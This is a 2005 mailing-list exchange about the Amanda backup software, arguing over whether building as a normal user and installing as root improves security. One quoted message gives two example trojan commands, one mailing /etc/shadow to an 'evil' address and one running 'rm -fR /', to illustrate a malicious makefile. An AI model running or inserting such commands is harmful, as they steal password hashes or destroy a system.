On Fri, Jan 21, 2005 at 06:15:28PM -0600, Frank Smith wrote:
>
>
> --On Friday, January 21, 2005 18:18:52 -0500 Eric Siegerman <erics AT
> telepres DOT com> wrote:
>
> > On Thu, Jan 20, 2005 at 10:22:16PM +0100, Stefan G. Weichinger wrote:
> >> - configure and make as $AMANDAUSER
> >
> > I don't believe this is necessary. One should avoid building
> > Amanda as root, but that's not because it'll cause problems for
> > Amanda; it's for the same reason one should avoid building
> > *anything* as root.
>
> Sorry for hijacking a thread, but playing devil's advocate here,
> what difference does it really make whether you build as root
> or not if you run 'make install' as root? How many people
> actually go through each line of the makefile, or run make -n
> first and examine all that, plus look through the code itself?
> In Amanda's case, for example, if the source for runtar
> contained code to 'mailx hax0r AT evil DOT com < /etc/shadow' or
> 'rm -fR /' would it really make any difference what user it
> was compiled under? Would they notice even if it wasn't buried
> in the source, but was just part of the 'install' target in
> the makefile (or an included subdirectory makefile)?
> For user programs, compiling and installing as a user
> can limit the damage that can be done, but if any part of
> the build, install, or execution ever has root privileges
> then you really aren't increasing your security by building
> as a normal user and installing as root.
> All that said, I generally do build as a normal user, as
> it can expose permission problems on libraries, paths, etc.
> at build time instead of later when users are trying to run
> the program.
You have said it yourself, as ordinary user you limit the
possible problems. Have you never looked at a file with
an editor and inadvertently modified it? Don't you ever
do little changes to the code or makefiles? How about
running your builds from a script as Gene H. does. Or
running my configure with a script that modifies the makefiles
to allow me a target of *.i output files (post-preprocessor).
I don't want to run these things as root. There doesn't have
to be anything malicious to be dangerous or unwanted. Just a
simple error that might cause less damage run by amanda than
run by root. Or even by user jon. Suppose I had a simple "cd"
in one of these scripts; like
cd $AmandaBuildDir
But I forgot to properly set AmandaBuildDir, or I misspelled it
in the script. Now it is a "cd <with no args>" meaning a cd to
the home directory of the person running it. I would rather it
went to amanda's, not jon's and certainly not root's home dir
before continuing the script.
jl
--
Jon H. LaBadie jon AT jgcomp DOT com
JG Computing
4455 Province Line Road (609) 252-0159
Princeton, NJ 08540-4322 (609) 683-7220 (fax)
|